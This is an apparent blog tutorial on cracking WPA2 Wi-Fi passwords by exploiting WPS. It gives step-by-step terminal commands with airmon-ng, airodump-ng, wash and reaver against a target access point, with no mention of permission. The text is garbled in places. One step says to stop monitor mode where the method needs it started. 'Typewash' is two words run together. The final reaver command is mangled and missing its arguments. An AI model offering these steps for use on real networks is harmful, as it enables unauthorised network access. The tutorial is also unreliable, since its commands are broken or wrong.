A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 security to be bypassed and effectively broken in many situations. Many access point they have a Wifi Protected Setup enabled by default (even after we hard reset the access point).
- Wireless card (support promiscuous mode)
- Access point with WPA2 and WPS enables
Steps to cracking WIFI WPA2 Password:
- Open your terminal (CTRL+ALT+T) and type airmon-ng
- The next step we need to stop our wireless monitor mode by running airmon-ng stop wlan0
- Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 your wireless interface will start capturing the data.
- From the step 3 above, we can find access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether target AP has WPS enabled or not. Typewash -i wlan0 -c 8 -C -s. If the WPS Locked status is No, then we ready to crack and move to step 5.
- The last step is cracking the WPA2 password using reaver. reaver -i-b'fail-wait=360
It will take few minutes to crack the password. The duration depends on hardware and wireless card.